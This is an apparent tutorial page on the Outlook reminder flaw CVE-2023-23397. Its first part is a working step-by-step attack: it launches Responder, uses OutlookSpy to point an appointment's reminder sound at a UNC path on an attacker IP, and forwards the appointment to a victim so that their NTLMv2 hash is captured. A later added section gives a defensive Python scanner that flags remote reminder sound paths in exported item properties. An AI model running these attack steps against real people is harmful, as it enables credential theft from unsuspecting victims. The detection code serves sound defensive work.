Outlook Reminder Privilege Escalation
Last modified: 2023-03-28
Outlook's reminder feature is vulnerable to privilege escalation through abuse of the UNC (Universal Naming Convention) file path of the reminder sound. This is tracked as CVE-2023-23397.
To carry out this attack, OutlookSpy is required, so install it before proceeding.
First, start Responder on our local machine to capture NetNTLM authentication.
```
# -I: Interface (eth0, tun0, etc.)
responder -I tun0
```
In Outlook, select the Home tab, click New Items, then choose Appointment in the drawer menu.
In the new Appointment window, select the OutlookSpy tab, then click CurrentItem. The AppointmentItem window will open.
In the AppointmentItem window, click the Script tab and enter the following value.
Replace “10.0.0.1” with your local server IP.
```
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\10.0.0.1\test.wav"
```
After that, click the Run button to apply the new properties.
To confirm that the properties were applied, click the Properties tab and choose the following items in the left pane.
Close the AppointmentItem window.
- Click the Appointment tab and click Reminder in the Options section. Then set it to 0 minutes.
- Fill in the Subject, Location and Message with arbitrary values.
- To send the appointment to the victim address, click Forward in the Actions section of the Appointment tab. Then enter the victim email address as the destination and click the Send button.
- Because we set the reminder to 0 minutes, we should see the reminder popup immediately after saving.
- In our terminal, the Responder instance that we launched has captured the NTLMv2 hash.
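
From the defender's side, the same three reminder properties are what to audit for. The following is an added example, not part of the original page: it triages exported item properties and flags any reminder sound file that points at a remote UNC host. The allowlisted host name, the severity labels and the sample records are assumptions constructed for illustration.

```python
import re

# Assumption: file servers approved for reminder sounds (constructed name).
ALLOWED_HOSTS = {"files.corp.example"}
# Matches \\host\share, //host/share and the \\?\UNC\host\share long form.
_UNC = re.compile(r"^[\\/]{2}(?:[?.][\\/]UNC[\\/])?([^\\/]+)[\\/]", re.IGNORECASE)

def unc_host(path):
    """Return the lower-cased remote host of a UNC path, or None if the path is local."""
    match = _UNC.match((path or "").strip())
    if not match:
        return None
    host = match.group(1)
    if host in ("?", "."):  # \\?\C:\... and \\.\... are local device paths
        return None
    return host.split("@", 1)[0].lower()  # drop WebDAV suffixes such as @80 or @SSL

def assess_reminder(item):
    """Triage one item from its reminder properties (dict keyed by property name)."""
    host = unc_host(item.get("ReminderSoundFile"))
    if host is None:
        return {"severity": "none", "host": None}
    if host in ALLOWED_HOSTS:
        return {"severity": "low", "host": host}
    # Example policy: both flags set is the combination the page's script uses.
    armed = bool(item.get("ReminderOverrideDefault")) and bool(item.get("ReminderPlaySound"))
    return {"severity": "high" if armed else "medium", "host": host}

def scan(items):
    """Return (subject, severity, host) for every item whose sound file is remote."""
    verdicts = [(item["Subject"], assess_reminder(item)) for item in items]
    return [(s, v["severity"], v["host"]) for s, v in verdicts if v["severity"] != "none"]

# Constructed sample records, shaped like an export of item properties.
SAMPLES = [
    {"Subject": "sync", "ReminderOverrideDefault": True, "ReminderPlaySound": True,
     "ReminderSoundFile": r"\\10.0.0.1\test.wav"},
    {"Subject": "standup", "ReminderOverrideDefault": False, "ReminderPlaySound": True,
     "ReminderSoundFile": r"C:\Windows\Media\reminder.wav"},
    {"Subject": "review", "ReminderOverrideDefault": True, "ReminderPlaySound": False,
     "ReminderSoundFile": r"\\?\UNC\203.0.113.7\s\a.wav"},
    {"Subject": "townhall", "ReminderOverrideDefault": True, "ReminderPlaySound": True,
     "ReminderSoundFile": r"\\FILES.corp.example\sounds\bell.wav"},
]

if __name__ == "__main__":
    for row in scan(SAMPLES):
        print(row)
```

Any non-"none" result deserves a look, since a reminder sound normally lives on the local disk.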